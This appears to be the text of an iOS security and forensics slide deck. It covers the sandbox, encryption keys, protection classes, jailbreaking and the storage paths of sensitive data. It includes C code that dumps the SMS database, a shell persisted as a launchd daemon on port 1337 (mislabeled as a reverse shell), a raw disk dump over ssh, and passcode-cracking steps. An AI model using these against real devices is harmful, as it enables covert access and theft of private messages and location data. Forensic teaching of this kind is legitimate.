Security and Forensics iOS Security and Forensics Powerpoint Templates

Apple’s Security Model iDevice applications available on Apple Store Tested, analyzed, approved, signed then distributed by Apple services Installed in: /private/var/mobile/Applications/{Unique_App_ID} Full list of installed applications : /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist Executed under “mobile” user in TrustedBSD sandbox ASLR and DEP activated All that, on a fully encrypted filesystem.

Apple’s Directories Sandboxing

TrustedBSD Sandbox Open source project for FreeBSD systems Sponsored by Apple, Google, Yahoo!, NSA… Modified and used by Apple for OS X and iOS Installs series of hooks, in order to intercept and filter syscalls. Policy retrieved from a human readable file then passed to the kernel in a binary format. Finally the kernel installs sanbox rules for the process

Policy rules Stored in /usr/share/sandbox and hardcoded in the Kernel Some policies configuration are done by the user through popups Written in ESDL schema, human readable: (version 1) (allow default) (deny file-read-data (regex #”^/private/tmp/test\.c$”)) $ sandbox_exec –p ‘{$POLICY}’ /bin/sh $ file /private/tmp/test.c test.c: cannot open: Operation not permitted $ sandbox_exec –n no-internet /bin/sh $ ping 4.2.2.2 ping: sendto: Operation not permitted The sandbox_init() syscall uses the libsandbox.dylib to convert the policy into binary format.

iDevice Storage Device NAND storage device exploited like the following: BOOT (block 0): contains the bootloader PLOG (block 1) : contains the EMF, BAG1 and Dkey EMF : used to encrypt the entire filesystem and HFS journal BAG1 : used to encrypt the keybag Dkey : used to encrypt files without encryption policy class NVM (block 2-7) : stores the NVRAM parameters FIRM (block 8-15) : stores the firmware, iBoot, device tree & logos FSYS (block 16-4084): stores the encrypted filesystem RSRV (last 15 blocks): reserved

At boot, the EMF and Dkey are extracted automatically Encryption mechanism Starting from iPhone 3GS, Apples devices contain hardware encryption processor. It permit the following: UID keys stored in the processor 0x835 & 0x89B keys derived from the UID key Filesystem : Data partition encrypted with EMF (AES-128) System partition encrypted with hardcoded AES-256 key (in kernel & bootloaders) Keychain encryption with the Dkey The Keybag contains Master Keys for Protection Classes Some Master Keys encrypted with passcode Each file on the filesystem encrypted with a “cprotect” key Each “cprotect” key is encrypted with the file’s associated Protection Class Master Key At boot, the EMF and Dkey are extracted automatically

Protection Classes Files decryption is defined according to their associated “Protection Classes”. Protection Classes used for files: NSFileProtectionComplete: file only decrypted when the iDevice is unlocked. NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stay decrypted even after lock if the application maintains it open. NSFileProtectionCompleteUntilUserAuthentication: file decrypted after a successful unlock. It remains decrypted until next reboot. NSFileProtectionNone: file decrypted using the Dkey. NSFileProtectionRecovery: undocumented. Protection Classes used for keychains: kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly] kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly] kSecAttrAccessibleAlways[ThisDeviceOnly]

Data wiping and recovery Filesystem’s wiping consists of rewriting the EMF & Dkey Files deletion consists of rewriting the associated cprotect The filesystem’s journal: encrypted with the Dkey contains cprotect keys in cleartext rotation depending on filesystem’s activity could be retrieved and used to recover deleted files /dev/disk0s1s2 raw data backup: Connect the iDevice to power supply Disable the autolock Run: $ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/{$USER}/dump.dmg' - Wait… for… a… while….

Security chain

Jailbreak Execution of third party applications/code allowed Unsigned code execution granting (depending on jailbreaks) Complete bypass of the sandbox Root (/) partition mounted in read/write. Before jailbreak: $ cat /etc/fstab /dev/disk0s1 / hfs r 0 1 /dev/disk2s1 /private/var hfs rw 0 2 After jailbreak: /dev/disk0s1 / hfs rw 0 1 Note: on iOS >=5, /dev/disk2s1 became /dev/disk1s2

Useful information launchd: first executed binary while booting (init like) watchdog: checks if a process is running in memory more than 5mn, if yes it reboots the iDevice launchctl : used to control daemons $ launchctl load com.adel.reverse_shell.plist ldid: Link Identity Editor, used to sign a binary $ ldid –S my_binary usbmux: protocol created to encapsulate TCP over USB connections. Optimized and used by iTune. XCode: developpment platform on Mac OS X, freely downloadable on Apple Store Cydia Store: online non official applications store for jailbroken devices SSH binaries: freely available package over Cydia store.

HelloWorld for iDevice Simple HelloWorld\n program: - $ cat helloworld.c #include <stdio.h> int main(int argc, char *argv[]) { printf(“HelloWorld\n”); return 0; } $ export PF=/Developer/Platforms/iPhoneOS.platform $ $PF/Developer/usr/boin/arm-apple-darwin10-llvm-gcc-4.2 -o hello hello.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/ Binary auto-siging: $ ldid –S hello Simple binary file transfer over SSH: $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary

Local File Disclosure $ cat lfi_smsdb.c #include <stdio.h> main() { FILE *fp=NULL; int c=0; fp=fopen("/var/mobile/Library/SMS/sms.db","r"); do { c=fgetc(fp); printf("%c",c); } while (!feof(fp)); fclose(fp); return 0; }

Reverse Shell $ cat reverse_shell.c #include <stdio.h> #include <unistd.h> main() { execve("/bin/sh", NULL, NULL); return 0; }

Process Daemonizing Copying reverse_shell to the iDevice /usr/bin Copying com.adel.reverse_shell.plist to the iDevice /System/Library/LaunchDaemons/ Rebooting the iDevice or : $ cd /System/Library/LaunchDaemons $ launchctl load ./com.adel.reverse_shell.plist

plist Manifest Format XML file format, used for configuration purpose $ cd /System/Library/LaunchDaemons $ cat com.adel.reverse_shell.plist <?xml version="1.0" encoding="UTF-8"?> <plist version="1.0"> ... <key>Label</key> <string>com.adel.reverse_shell</string> <key>Program</key> <string>/usr/bin/reverse_shell</string> <key>Sockets</key> <dict> <key>Listeners</key> <key>SockServiceName</key> <string>1337</string> </dict> </plist>

Physical Access Pwnage Many possibilities: Easy: the iDevice does not have passcode Full access to data over SpringBoard, SSH or after boot on ramdisk Medium: the iDevice has a passcode < 4 digits - Booting on ramdisk, patching the kernel and cracking the passcode Needs max 30mn of passcode cracking (10^4 possibilities) Medium ++: the iDevice has a passcode > 5 digits Could take time for cracking The xkcd 5$ wrench shall be used ! Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with that) ? Does it exist ?

LiveCD vs RAMDISK A 2mb HFS+ container with: customized launchd binaries to copy/execute plist files Loaded into the iDevice over USB and after reboot to DFU mode exploit the iDevice vulnerability load the ramdisk on RAM execute launchd disable watchdog option 1: scan and mount the filesystem (EMF + Dkey auto-extracted) copy files on the filesystem chroot on the mounted filesystem option 2: initialize the usbmux protocol read and send raw NAND data over USB (EMF + Dkey must be extracted manually

Sensitive Data Keyboard cache Clipboard buffer Consolidated GPS positions databse and latest GPS position Applications and Safari snapshot cache Google maps cache and history Address book, photos, songs, voice records, notes, calendar, call history SMS, MMS, drafts and SpotLight SMS cache Geolocalization tags on photos Safari cache, search list, bookmarks, cookies, history and WebKit cache Installed applications list Emails, applications, their data and cache Lastest dialed number, bookmarked contact list, IMSI, ICCID Configured access point list …

Keyboard Cache Contains the keyboard cache Written known and unknown words One cache per language Available in /private/var/mobile/Library/Keyboard/

Keyboard Cache

Applications snapshot Available in: $ /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg

Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db

Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db

Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db

End. Questions ?